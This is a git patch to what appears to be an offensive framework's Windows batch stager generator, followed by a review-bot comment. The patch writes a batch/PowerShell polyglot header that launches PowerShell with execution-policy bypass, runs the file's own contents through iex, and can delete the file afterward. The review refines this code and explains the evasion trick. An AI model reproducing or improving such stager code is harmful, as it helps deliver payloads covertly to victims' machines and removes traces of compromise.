From f3a6d70a7f48210e21157510446cc5742cb90665 Mon Sep 17 00:00:00 2001
From: Anthony Rose
Date: Fri, 6 Nov 2020 19:56:36 -0800
Subject: [PATCH] Removed bat file length limit (#385)
* updated batch file stager to remove command length restriction
* fixed self destruct setting
Co-authored-by: hubbl3
---
 lib/stagers/windows/launcher_bat.py | 11 ++++++++---
 1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/lib/stagers/windows/launcher_bat.py b/lib/stagers/windows/launcher_bat.py
index d70f5e24b..7ff91211c 100644
--- a/lib/stagers/windows/launcher_bat.py
+++ b/lib/stagers/windows/launcher_bat.py
@@ -134,11 +134,16 @@ def generate(self):
 print(helpers.color("[!] Error in launcher command generation."))
 return ""
 else:
- code = "@echo off\n"
- code += "start /b " + launcher + "\n"
+ # The start to the batch eliminates the batch file command limit. It was taken from here:
+ # https://www.reddit.com/r/PowerShell/comments/gaa2ip/never_write_a_batch_wrapper_again/
 if delete.lower() == "true":
 # code that causes the .bat to delete itself
- code += "start /b \"\" cmd /c del \"%%~f0\"&exit /b\n"
+ code = '# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText(\'%~f0\')|iex" & DEL \"%~f0\" & POPD /B\n'
+ else:
+ code = '# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText(\'%~f0\')|iex" & POPD /B\n'
+ code += launcher + "\n"
+
+ return code
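Review bot: Both new `code = '# 2>NUL & ...'` literals contain `\S`, `\W` and `\p` inside a non-raw single-quoted string; those are invalid escapes that Python keeps verbatim only with a DeprecationWarning (a SyntaxWarning from 3.12), so the generated path is right today by accident, and the `\\v1.0` beside them shows the `\v` case already bit once. Double every backslash in the path in both literals, `"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"` (a bare `r` prefix is not enough, because the `\'` and `\"` escapes in the same literal would then keep their backslashes and change the output). The two branches repeat the entire header and differ only in `& DEL "%~f0"`; building the shared prefix once and appending the delete step under the `delete` check would stop the self-destruct variant from drifting from the other. The link-only comment above `if delete` should state what the first line does: cmd.exe treats the leading `#` as a failing command whose error `2>NUL` hides and then hands the whole file to PowerShell through `ReadAllText`, while PowerShell reads that same first line as a comment, which is why no per-line batch limit applies. `generate` begins before this hunk, and the header's 11 old lines against the 8 visible suggest blank context lines were lost in the paste.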